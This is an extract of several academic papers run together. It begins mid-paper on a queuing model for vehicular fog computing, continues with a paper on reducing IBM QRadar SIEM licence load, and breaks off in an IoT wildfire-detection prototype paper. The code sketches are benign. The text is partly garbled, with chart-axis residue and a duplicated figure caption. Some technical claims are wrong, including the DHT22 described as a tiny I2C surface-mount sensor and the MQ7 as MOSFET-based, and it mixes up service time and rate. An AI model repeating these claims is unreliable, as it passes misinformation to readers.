The system model is represented by two parallel queues, each waiting line having a single server. The first queue represents a stationary fog formed by EC (Edge Computing) nodes, and the second queue is a mobile fog formed by the vehicles [12]. Both are assumed to operate independently. The service time distributions of the queues are independent and exponentially distributed with parameters μ1 and μ2 for the static and the mobile queue respectively. The arrival processes are Poisson processes with rates λ1 and λ2. We assume that the service discipline is the usual first come, first served. The static and mobile fog queues have maximum capacities of M and N message requests, respectively. An incoming request first reaches the fog dispatcher, which assigns the task to one of the fog nodes with probability p for the static node and (1 − p) for the mobile node, so that the incoming message is processed by the EC (static) or the vehicle (mobile) node. Our system model is represented in Fig. 2. After this step, another task controller between the fog and the cloud decides either that the task has completed its service and departs from the system, with probability q, or that it is sent to the CDC (Cloud Data Centres) for more processing in order to complete the service, with probability (1 − q).


Fig. 2. Queuing system model of vehicular fog computing.

4 Problem Analytical Model

Let Pij be the equilibrium probability that there are i and j message requests in the static and mobile fog, respectively.

4.1 The Mobile and Static Fog Nodes Models

The marginal distributions. We consider the marginal probabilities:

$P_{.j} = \sum_{i=0}^{M} P_{ij}$  (1)

$P_{i.} = \sum_{j=0}^{N} P_{ij}$  (2)

Solving the balance equations gives the following solution:

$P_{i.} = \rho_1^{i} P_{0.}$, with $P_{0.} = \frac{1 - \rho_1}{1 - \rho_1^{M+1}}$

$P_{.j} = \rho_2^{j} P_{.0}$, with $P_{.0} = \frac{1 - \rho_2}{1 - \rho_2^{N+1}}$

where $\rho_1 = \frac{\lambda_1}{\mu_1} < 1$ and $\rho_2 = \frac{\lambda_2}{\mu_2} < 1$ for stability.

4.2 QoS Performance Parameters

The static fog node model. The mean service throughput is

$X_{EC}^{s} = \mu_1 (1 - P_{0.}) = \mu_1 \frac{\rho_1 - \rho_1^{M+1}}{1 - \rho_1^{M+1}}$  (3)

The mean number of message requests is

$E_{EC} = \frac{\rho_1}{1 - \rho_1} \cdot \frac{1 - (M+1)\rho_1^{M} + M\rho_1^{M+1}}{1 - \rho_1^{M+1}}$  (4)

The EC server utilization is

$U_{EC} = \rho_1 \frac{1 - \rho_1^{M}}{1 - \rho_1^{M+1}}$  (5)

The mobile fog node model. The mean service throughput is expressed as

$X_{V}^{s} = \mu_2 \frac{\rho_2 - \rho_2^{N+1}}{1 - \rho_2^{N+1}}$  (6)

The mean number of message requests is obtained using the equation

$E_{V} = \frac{\rho_2}{1 - \rho_2} \cdot \frac{1 - (N+1)\rho_2^{N} + N\rho_2^{N+1}}{1 - \rho_2^{N+1}}$  (7)

The server utilization is

$U_{V} = \rho_2 \frac{1 - \rho_2^{N}}{1 - \rho_2^{N+1}}$  (8)

QoS performance parameters of the Fog Computing tier. The total mean service throughput is

$X_{FC}^{s} = X_{EC}^{s} + X_{V}^{s} = \mu_2 \frac{\rho_2 - \rho_2^{N+1}}{1 - \rho_2^{N+1}} + \mu_1 \frac{\rho_1 - \rho_1^{M+1}}{1 - \rho_1^{M+1}}$  (9)

The total service utilisation is

$U_{FC} = U_{V} + U_{EC} = \rho_1 \frac{1 - \rho_1^{M}}{1 - \rho_1^{M+1}} + \rho_2 \frac{1 - \rho_2^{N}}{1 - \rho_2^{N+1}}$  (10)

Finally, the total mean number of message requests is

$E_{FC} = E_{EC} + E_{V}$  (11)
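A minimal Python sketch that evaluates the closed-form metrics of Eqs. (3)–(11); it assumes, following Fig. 2, that the dispatcher splits the Poisson arrivals so that λ1 = pλ and λ2 = (1 − p)λ, and the numerical values at the end are illustrative choices that keep both queues stable (ρ < 1), not the paper's exact settings:

```python
def mm1k_metrics(lam, mu, K):
    """Finite-capacity M/M/1/K queue (rho != 1 assumed for stability):
    returns (mean throughput, mean number of requests, server utilization)."""
    rho = lam / mu
    denom = 1 - rho**(K + 1)
    throughput = mu * (rho - rho**(K + 1)) / denom                                          # Eqs. (3)/(6)
    mean_requests = (rho / (1 - rho)) * (1 - (K + 1) * rho**K + K * rho**(K + 1)) / denom   # Eqs. (4)/(7)
    utilization = rho * (1 - rho**K) / denom                                                # Eqs. (5)/(8)
    return throughput, mean_requests, utilization

def fog_tier_metrics(lam, p, mu1, mu2, M, N):
    """Aggregate tier-level QoS parameters, Eqs. (9)-(11), assuming the dispatcher splits
    arrivals as lambda1 = p*lam (static EC node) and lambda2 = (1-p)*lam (vehicle node)."""
    x_ec, e_ec, u_ec = mm1k_metrics(p * lam, mu1, M)
    x_v, e_v, u_v = mm1k_metrics((1 - p) * lam, mu2, N)
    return x_ec + x_v, e_ec + e_v, u_ec + u_v

# Illustrative, stable parameter values (rho < 1); mu values are service rates.
print(fog_tier_metrics(lam=100, p=0.2, mu1=100, mu2=120, M=60, N=50))
```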

5 Numerical Results

In this section we briefly analyse the theoretical results of our model and show the effect of mobility on our vehicular fog computing model. We fix the values of λ, μ1, N, M and p; the simulation parameters are listed in Table 1. We plot some of the QoS parameters, namely the total mean service throughput, the total service utilisation and the total mean number of requests of the fog tier, for different values of the mean service time of the mobile fog node μ2, in order to show the effect of mobility and of the variation of the structure of the mobile fog nodes on the system performance.

Table 1. Simulation parameters.
– λ, message request arrival rate: 1000 to 10,000 req/s
– μ1, mean message request EC service time: 0.01 s
– N, maximum number of message requests in the mobile fog node: 50
– M, maximum number of message requests in the static fog node: 60
– p, probability that the message is forwarded to the static fog node: 0.2

Fig. 3. The service utilisation of the fog tier: (a) versus the incoming rate, for different values of the mean service time of the mobile fog node μ2 (0.01, 0.02, 0.06); (b) versus the service rate.

6 Discussion

Figure 3a plots the service utilisation of the fog tier: when the arrival rate increases, the service utilisation increases, and when μ2 (the mean service time of the mobile fog) gets larger, the service utilisation also increases; Fig. 3b confirms this. Figure 4a shows that the mean number of requests changes with λ: starting from λ = 1000, the number of requests decreases as λ increases, but for λ > 9000 the mean number of request messages flattens out. When μ2 gets larger, the mean number of requests of the fog tier decreases, as shown in Fig. 4a and Fig. 4b. Figure 5a shows the mean throughput of the fog tier for various values of μ2: when λ increases, the mean throughput increases; when μ2 gets smaller, the mean throughput also gets smaller, meaning that less throughput is achieved, as shown in Fig. 5b.

Fig. 4. The mean number of requests of the fog tier: (a) versus the incoming rate, for different values of the mean service time of the mobile fog node μ2 (0.02, 0.04, 0.06); (b) versus the service rate.

Fig. 4. The mean number of requests of the fog tier 30

200 mu21=0.02 mu22=0.04 mu23=0.06

180

the mean throughput service

the mean throughput service

25

20

15

10

160 140 120 100 80 60 40

5

20 0 1000

2000

3000

4000

5000

6000

incoming rate

7000

8000

9000

10000

0 0.1

0.15

0.2

0.25

0.3

0.35

0.4

0.45

0.5

service rate

(a) The mean throughput service of the fog(b) The mean throughput service of the fog tier for different mean service time of mobiletier fog node µ2

Fig. 5. The mean throughput service of the fog tier

7 Conclusion

This work presented a model architecture of fog computing using vehicles as part of the infrastructure of the fog tier. Moreover, we introduced a queuing theory model in order to study the QoS parameters and the effect of the mobility of vehicles on the system performance. Our numerical results reinforce our view that mobility definitely affects the performance of our model. As a perspective of this work, we plan to study the effect of mobility on the message requests and how to manage the loss of the signal if the vehicle leaves the system before achieving the required task.


References 1. Gaouar, N., Lehsaini, M.: Toward vehicular cloud/fog communication: a survey on data dissemination in vehicular ad hoc networks using vehicular cloud/fog computing. Int. J. Commun. Syst. 34(13), e4906 (2021) 2. Hou, X., Li, Y., Chen, M., Wu, D., Jin, D., Chen, S.: Vehicular fog computing: a viewpoint of vehicles as the infrastructures. IEEE Trans. Veh. Technol. 65(6), 3860–3873 (2016) 3. Kanyilmaz, A., Cetin, A.: Fog based architecture design for iot with private nodes: a smart home application. In: 2019 7th International Istanbul Smart Grids and Cities Congress and Fair (ICSG), pp. 194–198. IEEE (2019) 4. Laroui, M., Nour, B., Moungla, H., Cherif, M.A., Afifi, H., Guizani, M.: Edge and fog computing for iot: a survey on current research activities & future directions. Comput. Commun. 180, 210–231 (2021) 5. Lee, S.s., Lee, S.: Resource allocation for vehicular fog computing using reinforcement learning combined with heuristic information. IEEE Internet Things J. 7(10), 10450–10464 (2020) 6. Liang, J., Zhang, J., Leung, V.C., Wu, X.: Distributed information exchange with low latency for decision making in vehicular fog computing. IEEE Internet Things J., 1 (2021) 7. Menon, V.G., Prathap, J.: Vehicular fog computing: challenges applications and future directions. Int. J. Veh. Telemat. Infotainment Syst. (IJVTIS) 1(2), 15–23 (2017) 8. Ravi, B., Thangaraj, J.: Stochastic traffic flow modeling for multi-hop cooperative data dissemination in vanets. Phys. Commun. 46, 101290 (2021) 9. Sarkar, S., Misra, S.: Theoretical modelling of fog computing: a green computing paradigm to support iot applications. Iet Networks 5(2), 23–29 (2016) 10. Xiao, Y., Zhu, C.: Vehicular fog computing: vision and challenges. In: 2017 IEEE International Conference on Pervasive Computing and Communications Workshops (PerCom Workshops), pp. 6–9. IEEE (2017) 11. Yousefpour, A., Fung, C., Nguyen, T., Kadiyala, K., Jalali, F., Niakanlahiji, A., Kong, J., Jue, J.P.: All one needs to know about fog computing and related edge computing paradigms: a complete survey. J. Syst. Architect. 98, 289–330 (2019) 12. Zhu, C., Pastor, G., Xiao, Y., Li, Y., Ylae-Jaeaeski, A.: Fog following me: Latency and quality balanced task allocation in vehicular fog computing. In: 2018 15th Annual IEEE International Conference on Sensing, Communication, and Networking (SECON), pp. 1–9. IEEE (2018)

From Firewall and Proxy to IBM QRadar SIEM Yasmine El Barhami1(B) , Hatim Kharraz Aroussi2 , and Chaimae Bensaid3 1 Cybersecurity Engineer, Math-Computer Science Laboratory, Ibnu Tofail University, Kenitra,

Morocco [email protected] 2 Réseaux et Capteurs Math-Computer Science Laboratory, Ibnu Tofail University, Kenitra, Morocco 3 Ingénieur DBA, Math-Computer Science Laboratory, IbnuTofail University, Kenitra, Morocco

Abstract. Nowadays, we often hear about information systems, the systems that make up all companies in different sectors. This is a concept that emerged at the beginning of the 1980s and has changed the organization of companies by pushing them towards competition. An information system can be found in any type of company, SME or large company, and is composed of:
• Applications: generally the ERP is the heart of the IS, as well as the CRM if there are interactions with the customer, the HRIS (Human Resources Information System), marketing, specific developments, services, APIs (Application Programming Interfaces), etc.
• Users: more specifically, tools and services from the workstation to mobility (office automation)
• Administration: the management of the IS and its components
• Infrastructure: everything that includes storage servers, databases, networks, virtualization, cloud, Big Data, IoT, and security equipment such as firewalls, proxies, IDS and anti-virus; this is what interests us most in our topic
An information system resides in any type of company, including critical infrastructures, which are the constructions that are decisive for our society. Critical infrastructure can simply be defined as the set of critical systems. It is composed of nine sectors, subdivided into 27 subsectors (branches); in principle, all elements (operating companies, IT systems, installations, constructions, etc.) that provide services in one of the 27 sub-sectors are concerned, regardless of their criticality. So the question that arises is: how can we secure the critical data of these critical infrastructures against attacks such as ransomware or phishing in order to ensure the security of the information system?
Keywords: IS · Security · Attacks · Infrastructure · Vulnerability · Critical

1 Introduction
Recently, remote working, the porosity of information systems that accompanies it, 5G, the proliferation of connected objects and the increased use of artificial intelligence are


elements that have encouraged hackers to develop their skills in finding vulnerabilities in information systems, while companies are still looking for the vulnerabilities of their own systems and securing them. However, despite the power of today's security tools, the number of attacks has increased in recent years by a very large percentage. Referring to data from the French National Agency for the Security of Information Systems (ANSSI), the number of ransomware attacks has increased threefold or fourfold in one year, with 128 attacks listed as of September 30, 2020 against 54 throughout 2019. Here we present a basic classification of attacks that can be a cause of slow network performance, uncontrolled traffic, viruses, etc. Attacks can be classified into two categories: "passive", when a network intruder intercepts data circulating on the network, and "active", in which an intruder issues commands to disrupt the normal operation of the network. So, going back to the main question mentioned in the abstract, how can an information system be secured against these threats? First, it is necessary to target the important elements to be secured in a critical infrastructure, such as [2]:
A. Data Privacy: privacy is the ability to conceal messages from a passive attacker so that any message communicated over the network remains confidential. This is the most important issue when it comes to network security.
B. Data Authentication: authentication ensures the reliability of the message by identifying its origin. Attacks in sensor networks do not just involve packet tampering; opponents can also inject additional fake packets. Authentication verifies the identity of senders and recipients.
C. Data Integrity: data integrity is necessary to ensure the reliability of the data and refers to the ability to confirm that a message has not been tampered with, modified or changed. Even if the network is confidential, it is still possible that the integrity of the data has been compromised by changes.
D. Data Availability: availability determines whether a node has the capacity to use resources and whether the network is available for messages to be communicated. A failure of the base station or of the cluster leader's availability will eventually threaten the entire network.
Once the target points are identified, we can move on to solutions for protecting the IS of critical infrastructures against threats. Any company with an information system is obviously equipped with workstations, servers, switches (level 2 & 3), routers, storage servers, a DMZ zone, etc. To secure the local network against the external network, the IS must have a proxy powerful enough to check the incoming and outgoing Internet traffic and a new-generation firewall intelligent enough to handle all the Internet and application traffic. Despite the availability of these two elements, critical infrastructures remain vulnerable to zero-days and new types of attacks whose sophistication improves over time. They must therefore have a 24/7 monitoring system to monitor all information system (IS) activities and deduce events that could turn into security incidents requiring special care.


To answer the main question: the solution is to set up a Security Operation Center (SOC) that monitors critical and important traffic using a SIEM tool [3].

2 SIEM IBM QRadar

Security Information and Event Management (SIEM) has been defined as a software solution that ensures the information security of an information system. More precisely, a SIEM is a set of security software tools covering the following functions:

• Log collection and analysis
• Log transfer in a standard format
• Security threat notification
• Security incident detection
• Incident response workflow

Basically, the role of a SIEM is to collect logs from all the security tools and from all the critical equipment (anti-virus, anti-spam, WAF, routers, layer 3 switches, MS Exchange, AIX, etc.), to correlate them, and to display them on a console 24 hours a day according to the personalized rules that have been implemented. Intrusion rules must be configured so that the SIEM generates alerts depending on the context. It then remains to choose the most efficient SIEM solution suited to the IS of a critical infrastructure. According to Gartner's Magic Quadrant published in 2018, the leader among SIEM solutions remains IBM QRadar (Fig. 1). IBM Security QRadar Security Information and Event Management (SIEM) helps security teams detect, prioritize, and respond to threats across the enterprise. The solution automatically analyzes and aggregates log and flow data from thousands of devices, endpoints, and applications on the network, and provides unique alerts to accelerate incident analysis and resolution. QRadar SIEM is available for on-premises and cloud environments. The solution offers several highly developed features, such as:

• Visibility across Windows, Linux, Unix, and other environments
• Real-time threat detection
• Prioritized, automated triage of alerts concerning IS vulnerability points
• Preconfigured compliance and intrusion detection policy content
• Faster response to threats

These features rely on the QRadar architecture, which is composed of the following modules:

• QRadar Console: provides the visualization of results.
• QRadar Event Collector: collects, normalizes, and restructures received logs according to the expected format.


Fig. 1. IBM QRadar - the leader of SIEM-solutions (integrity.com.ua)

• QRadar Event Processor: processes the logs received by the QRadar Event Collector using predefined rule engines to generate alerts.
• QRadar QFlow Collector: plays the same role as the QRadar Event Collector but for real-time data such as captured network traffic.
• QRadar Flow Processor: plays the same role as the QRadar Event Processor but processes the data received from the QRadar QFlow Collector.
• QRadar Data Node: adds storage and analytics capacity as needed.

An example diagram illustrating the architecture of the solution is shown in Fig. 2. QRadar also addresses the Big Data aspect through the QRadar Data Node module, which allows adding as many nodes as necessary to handle the volume of logs received. Our SIEM deployment benefits both from this capability and from its distributed architecture, composed of a master server and several slave servers, on top of the adopted Big Data platform. A load-sharing tool in RAM is also used to avoid losing data in case of congestion. QRadar is a commercial SIEM billed by the number of events received per second (EPS): when this number is exceeded, the data is stored in the event queue of the QRadar Event Collector module until the throughput decreases. However, if the limit is still exceeded and the queue fills up, the system drops the events and QRadar notifies the administrator. This remains a major problem, because dropping events can mean losing logs or generating errors on source logs, with the consequence that malicious traffic requiring immediate intervention may go unnoticed.


Fig. 2. Brain Book: QRadar SIEM ARCHITECTURE (https://arfanahmedcheema.blogspot.com)

QRadar is intended for large companies because its acquisition cost is high. Provisioning a high EPS rate to avoid load saturation and log deletion is also expensive, which leads to the core question of this work: how can the EPS threshold be respected while keeping the network architecture affordable? After a long search, we found that several vendors in the information security space offer data plans for their security information and event management (SIEM) products. However, the word "unlimited" does not have an agreed-upon definition across vendors, and most of them take a restrictive view of "unlimited" data plans. LogRhythm is an exception: its Unlimited Data Plan [6] allows limitless data collection and processing for the life of the contract, at a fixed cost, no matter how much the organization grows, so that all data can be managed and monitored without licensing constraints forcing a choice of which data to protect. The proposed solution is therefore to deploy a second SIEM with unlimited EPS and data volume to collect, correlate, and centralize the logs, and to forward only alerts to QRadar. The main benefits of this solution are:

• No limitation on EPS consumption
• Reduced storage consumption

A minimal sketch of such an alert-only forwarder is given below.
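The following Python sketch illustrates the idea of forwarding only correlated alerts to QRadar over syslog while all raw events stay in the primary SIEM. It is a sketch under stated assumptions, not the deployed implementation: the host name, port, and the alert-selection rule are illustrative placeholders.

```python
import json
import socket

QRADAR_HOST = "qradar.example.local"   # assumed QRadar event collector address
QRADAR_SYSLOG_PORT = 514               # standard syslog port

def is_alert(event: dict) -> bool:
    """Keep only events the primary SIEM has already flagged as alerts.
    The 'severity' field and threshold are illustrative assumptions."""
    return event.get("type") == "alert" and event.get("severity", 0) >= 5

def forward_alerts(events, host=QRADAR_HOST, port=QRADAR_SYSLOG_PORT):
    """Send selected alerts to QRadar as simplified syslog/UDP messages."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sent = 0
    for event in events:
        if not is_alert(event):
            continue  # raw events remain in the unlimited-EPS SIEM only
        message = "<134>primary-siem: " + json.dumps(event)
        sock.sendto(message.encode("utf-8"), (host, port))
        sent += 1
    sock.close()
    return sent

if __name__ == "__main__":
    sample = [
        {"type": "log", "severity": 2, "msg": "user login"},
        {"type": "alert", "severity": 7, "msg": "possible ransomware activity"},
    ]
    print(forward_alerts(sample), "alert(s) forwarded to QRadar")
```

In this way, only the filtered alert stream counts against the QRadar EPS license, while the full log volume is retained in the unlimited-plan SIEM.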

References

1. https://www.babs.admin.ch/fr/aufgabenbabs/ski/kritisch.html
2. Microsoft Word - 20070913 IJCSIS Camera Ready Paper.doc (arxiv.org)
3. International Journal of Soft Computing and Engineering (researchgate.net)
4. IBM QRadar - the leader of SIEM-solutions (integrity.com.ua)
5. Brain Book: QRadar SIEM ARCHITECTURE (arfanahmedcheema.blogspot.com)
6. https://logrhythm.com/blog/the-only-unlimited-siem-data-plan-in-town/

IoT-Based Approach for Wildfire Monitoring and Detection Mounir Grari1(B) , Idriss Idrissi1 , Mohammed Boukabous1 , Mimoun Yandouzi2 , Omar Moussaoui1 , Mostafa Azizi1 , and Mimoun Moussaoui1 1 MATSI, UMP, Oujda, Morocco

[email protected] 2 LARI, UMP, Oujda, Morocco

Abstract. Wildfires are unpredictable and dangerous events that have the potential to cause great damage and loss of life. They can spread quickly, often burning thousands of acres of land, and many people and animals are killed or injured by wildfires every year. Forest wildfires are particularly difficult to predict and monitor, especially in remote areas. However, with the help of the Internet of Things (IoT), fire officials can use data collected from remote sensors to identify potential fires, predict their trajectory, and even issue alerts to those in a fire's path. By using IoT, fire officials can build a more effective response plan and save lives and property. In this paper, we propose an IoT-based solution to detect and monitor wildfires. The approach consists in deploying an architecture of IoT devices in the forest, such as temperature and humidity sensors. To this end, we develop an IoT device model intended to provide a proof of concept for this scheme. Keywords: Wildfires · Forest Fire · Internet of Things (IoT) · Sensors

1 Introduction

Forests protect the planet's ecological balance. Sadly, most forest fires are only detected after they have spread over large swaths of land, making them difficult, if not impossible, to manage and extinguish [1]. Human-made wildfires that break out in rural regions with combustible vegetation are started either accidentally or deliberately. Wildfires affect transportation, communications, electricity, gas services, and water supply, among other infrastructures. They may degrade air quality, cause property damage, harm crops, exhaust resources, endanger animals, and harm humans. One recent devastating episode occurred in Turkey, where more than a hundred fires erupted across the country, killing numerous people, including firefighters combating the blazes [2]. Scientists believe that global warming is fueling the flames that burn in the sweltering summer heat [3]. Using cutting-edge technologies, we can devise novel methods for detecting and monitoring forest fires in their early stages and tracking their spread. Modern sensors have made it easier to detect forest fires in progress [3–8].


The broad deployment of sensors and intelligent IoT systems has the potential to change wildfire monitoring and detection approaches. Wireless sensor networks (WSN) can also be used for continuous monitoring of the environment and for timely detection of potential fire hazards. The advancement of IoT has led to the development of new applications and services [9] that can be used efficiently to predict and monitor events such as wildfires. For instance, IoT devices with temperature and humidity sensors are well suited to predicting the likelihood of a wildfire. Other sensors, such as those for light, carbon monoxide, and oxygen levels, can also be exploited to improve wildfire predictions. WSNs are composed of spatially distributed autonomous IoT devices that can collect and exchange data with minimal human intervention. Low-power wide-area networks (LPWANs), such as LoRaWAN, are suitable for connecting large numbers of sensors and are widely used to send data over long distances. The combination of IoT and LPWANs shows promise for improving the accuracy and timeliness of wildfire detection. For example, aerial thermal images allow detecting hot spots that may indicate the start of a wildfire. However, the use of aerial images is not always possible, due to weather conditions or the remoteness of the area. In these cases, data from ground-based sensors can create a more complete picture of the situation. Data collected from sensors can be processed and analyzed to identify patterns that may indicate the start of a wildfire. By using data from multiple sources, including thermal images, smoke detectors, and weather sensors, it is possible to detect wildfires with a high degree of accuracy [10]. In this paper, we propose an IoT-based methodology for detecting and monitoring wildfires. To demonstrate the feasibility of this strategy, we have designed an IoT device that includes temperature, humidity, and carbon monoxide sensors. The rest of the paper is structured as follows: the second section reviews the background of the technologies used; related works are presented in the third section; our proposed methodology is described in the fourth section; and, before concluding, the fifth section discusses the obtained results.

2 Background

2.1 Internet of Things

The IoT refers to devices with embedded sensors that can transmit data and, in some cases, be controlled remotely. Smart thermostats and remotely controlled lighting fixtures are common examples, but many others exist, ranging from traffic sensors and water quality meters to smart grid components and trackers for manufactured goods and vehicle fleets all over the world [11]. The number of standards, instruments, projects, policies, frameworks, and organizations vying to define how advanced connected devices communicate grows as the IoT grows [12]. Open-source software and open standards will become increasingly important for devices to interconnect properly and for the back end to process the vast amounts of big data that all of these devices will generate [13, 14].


2.2 Sensors

DHT22 Sensor. The DHT22 (also called AM2302) sensor is a digital temperature and humidity sensor. The temperature readings are accurate to within 0.5 °C and the humidity readings to within 2–5% [15]. The sensor communicates over a digital I2C (Inter-Integrated Circuit) interface and consumes very little power, making it ideal for battery-powered applications. It is a small surface-mount device with dimensions of 1.5 mm × 2.5 mm [16].

MQ7 Sensor. The MQ7 is a sensor that detects the amount of carbon monoxide in the air. It is used in devices such as fire detectors, gas leak detectors, and breath analyzers. The MQ7 is a semiconductor sensor that detects carbon monoxide using a metal-oxide-semiconductor field-effect transistor (MOSFET), which generates a voltage proportional to the amount of carbon monoxide present in the air [17]. Sensor calibration is necessary to verify that the measurements are accurate and consistent with those of other equipment. Based on the environmental comparison scale used to test the system, multiple test scenarios are performed to calibrate the sensor. A minimal reading sketch for these two sensors is shown below.
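As an illustration only, and not the authors' firmware, the following MicroPython-style sketch shows how an ESP32 could sample the DHT22 and read the MQ7 analog output. The pin numbers and the raw CO handling are assumptions; the MQ7 value would still need the calibration step described above before being interpreted as a concentration.

```python
# MicroPython sketch (assumed pin wiring; MQ7 output is left as a raw ADC value).
import dht
from machine import Pin, ADC
import time

dht_sensor = dht.DHT22(Pin(4))        # assumed: DHT22 data line on GPIO4
mq7_adc = ADC(Pin(34))                # assumed: MQ7 analog output on GPIO34
mq7_adc.atten(ADC.ATTN_11DB)          # full 0-3.3 V input range on the ESP32

def read_environment():
    """Return (temperature in degrees C, relative humidity in %, raw CO reading)."""
    dht_sensor.measure()
    temperature = dht_sensor.temperature()
    humidity = dht_sensor.humidity()
    co_raw = mq7_adc.read()           # 0-4095; must be mapped to ppm after calibration
    return temperature, humidity, co_raw

while True:
    t, h, co = read_environment()
    print("T={:.1f}C H={:.1f}% CO_raw={}".format(t, h, co))
    time.sleep(10)                    # DHT22 needs at least 2 s between readings
```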

2.3 LoRaWAN

LoRaWAN is a low-power, long-range wireless network technology designed for IoT devices. It operates in unlicensed sub-GHz bands (for example 868 MHz or 915 MHz, depending on the region) and has a range of up to 10 km, making it well suited to connecting devices in rural or remote areas. LoRaWAN is also energy-efficient, allowing devices to operate for years on a single battery charge [18]. It is ideal for applications like building monitoring, smart agriculture, and asset tracking.

2.4 ESP32

The ESP32 is a low-cost, low-power 32-bit Wi-Fi and Bluetooth microcontroller. It has a dual-core processor and integrates an antenna switch, RF balun, power amplifier, low-dropout regulator, and crystal oscillator. It also includes 4 MB of SPI flash and supports the lwIP (lightweight IP) stack, which provides a full TCP/IP suite. The ESP32 can be used to build a wide range of applications such as wireless communication, home automation, and smart devices [19].

2.5 MQTT

MQTT (Message Queuing Telemetry Transport) is a lightweight machine-to-machine (M2M) publish/subscribe messaging protocol. It can be used to connect IoT things, wearable devices, smart sensors, embedded systems, and other M2M equipment. Devices subscribe to topics, and when a message is published on a topic, it is delivered to all devices that have subscribed to that topic [20]. MQTT is an ideal transport protocol for IoT applications in which devices may need to publish status updates or receive updates about changes in the environment [21]. A minimal publishing sketch is given below.
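To make the publish/subscribe flow concrete, here is a hedged sketch (not taken from the paper) of a fog gateway relaying one telemetry message to a cloud broker with the widely used paho-mqtt Python client. The broker address and topic name are assumptions.

```python
import json
import paho.mqtt.client as mqtt

BROKER_HOST = "cloud-broker.example.org"    # assumed cloud MQTT broker
TELEMETRY_TOPIC = "forest/zone1/telemetry"  # assumed topic naming scheme

def publish_telemetry(reading: dict) -> None:
    """Publish one sensor reading as JSON with QoS 1 (at-least-once delivery)."""
    client = mqtt.Client()  # paho-mqtt 1.x style; 2.x also expects a CallbackAPIVersion
    client.connect(BROKER_HOST, 1883, keepalive=60)
    client.loop_start()                      # background network loop
    info = client.publish(TELEMETRY_TOPIC, json.dumps(reading), qos=1)
    info.wait_for_publish()                  # block until the broker acknowledges
    client.loop_stop()
    client.disconnect()

if __name__ == "__main__":
    publish_telemetry({"device": "node-01", "temp_c": 27.4,
                       "humidity_pct": 41.0, "co_raw": 512})
```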


3 Related Work

The problem of fire detection has been addressed in two different ways, namely classification [22–25] and regression [26]. The authors of [22] used a ZigBee-based WSN to collect CO, CO2, smoke concentration, air temperature, relative humidity, and GPS position with a CC2430 board, and the retrieved data is saved on a remote server. The work in [23] used a nearly identical architecture, with an IRIS XM2110 board collecting only three data points: light, temperature, and sound. The works [24, 26] are based on an IoT architecture that includes Wi-Fi and an Arduino board connected to a Bolt module: [24] captured temperature and humidity, soil moisture, pressure, altitude, and GPS position in the BOLT Cloud, while [26] attempted to predict post-fire air pollution levels (forecasting three different air pollutants, namely CO, NH3, and O3) using Microsoft Azure as the cloud solution. Finally, [25] collects temperature, humidity, light intensity, and CO level using an Arduino Nano equipped with an nRF24L01 wireless radio communication module and a SIM800 GSM module; the proposed server-side solution consists of a PC and another Arduino Nano board equipped with the same communication modules. Diverse sensors are used by researchers, as seen in the related works [22–34]; however, the most frequent sensors are temperature (86%), humidity (79%), and CO (36%). These results served as the foundation of our proposed methodology.

4 Proposed Methodology

Our proposed IoT prototype embeds several sensors and is attached to trees so that it is out of reach of both animals and people, while still collecting as much data as possible with the widest possible coverage. After the sensors collect data on temperature, humidity, CO concentration, and other relevant measurements, the device sends them via LoRa to the fog gateway (based on the related works [22–36]). The gateway is intended to be placed at a high point in order to exchange data with the IoT devices without obstacles. Data is then processed by the gateway and sent to the cloud using the lightweight MQTT protocol over 2G, 3G, 4G, or satellite links for further analysis, storage, and dashboarding (see Fig. 1).

4.1 Proposed Prototype

The DHT22 sensor (temperature and humidity) and the MQ7 sensor (CO) are the two primary sensors in our proposed prototype (the sensing can be extended with any relevant sensors, such as soil humidity). The ESP32 microchip uses these two sensors as input sources (based on the related works [22–27, 31–33]). It receives data from them, then sends an MQTT telemetry message to the fog node, and, in case of an abnormal situation (high temperature, gas detection, or reduced humidity), it sends an urgent warning to the authorities. This is a quicker way of determining whether a fire is likely to break out. In this fire detection system, both the DHT22 and the MQ7 are used to identify the possibility of a wildfire, and the data is then analyzed on the ESP32. Fire departments and authorities are alerted if the temperature reaches a certain threshold. As a result, the risk of casualties is reduced by making it simpler for firefighters to deal with fires and perform rescues if needed. A hedged sketch of this alert logic follows.
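The sketch below illustrates one way the on-device decision could be expressed. The thresholds are placeholder assumptions that would have to come from the calibration step, not from the paper.

```python
# Placeholder thresholds: real values must come from field calibration.
TEMP_ALERT_C = 55.0        # assumed high-temperature threshold
HUMIDITY_ALERT_PCT = 15.0  # assumed low-humidity threshold
CO_ALERT_RAW = 1500        # assumed raw ADC threshold for CO

def classify_reading(temp_c: float, humidity_pct: float, co_raw: int) -> str:
    """Return 'alert' when the readings suggest a possible fire, else 'normal'."""
    danger_signs = 0
    if temp_c >= TEMP_ALERT_C:
        danger_signs += 1
    if humidity_pct <= HUMIDITY_ALERT_PCT:
        danger_signs += 1
    if co_raw >= CO_ALERT_RAW:
        danger_signs += 1
    # Require at least two concurrent signs to limit false alarms.
    return "alert" if danger_signs >= 2 else "normal"

def build_message(device_id: str, temp_c: float, humidity_pct: float, co_raw: int) -> dict:
    """Assemble the telemetry payload; 'alert' messages are forwarded urgently."""
    status = classify_reading(temp_c, humidity_pct, co_raw)
    return {"device": device_id, "temp_c": temp_c,
            "humidity_pct": humidity_pct, "co_raw": co_raw,
            "status": status}
```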


Fig. 1. Proposed methodology for monitoring and detection of Wildfire using IoT

5 Results and Discussions

A simulation of a real fire in an open space was set up to demonstrate the applicability of our approach and to assess the feasibility of using IoT for fire detection. At this phase, the sensors were calibrated in the actual environment (forest and open space in our case). Based on the tests conducted in a realistic environment, we conclude that the sensor readings meet the predetermined requirements (we performed multiple tests at various distances and heights from the fire), and the device successfully sends its telemetry messages (see Fig. 2). The received readings are presented in a dashboard (we tested a variety of open-source IoT platforms such as ThingSpeak [37], ThingsBoard [38], Node-RED [39], …). The readings from the sensors can be seen in the dashboard (see Fig. 3), which presents the temperature, humidity, and CO values: the temperature reading is at the top of the dashboard, followed by the humidity reading and then the CO reading. The temperature sensor measures the air temperature, the humidity sensor measures the amount of water vapor in the air, and the CO sensor measures the level of carbon monoxide in the air. Generally, higher humidity is associated with lower air temperature, and the higher the CO level, the more dangerous the situation. The location of the IoT device (prototype) is also displayed to help locate the deployed devices. The dashboard can be used to monitor the sensors in near real time and is also a useful tool for detecting anomalies in the collected data. A hedged example of feeding such a dashboard is given at the end of this section. These results show that IoT devices can be used to monitor many different factors associated with wildfires. This can be extended using other sensors, for example:


Fig. 2. Simulation of a real fire

Fig. 3. Wildfires IoT platform dashboard

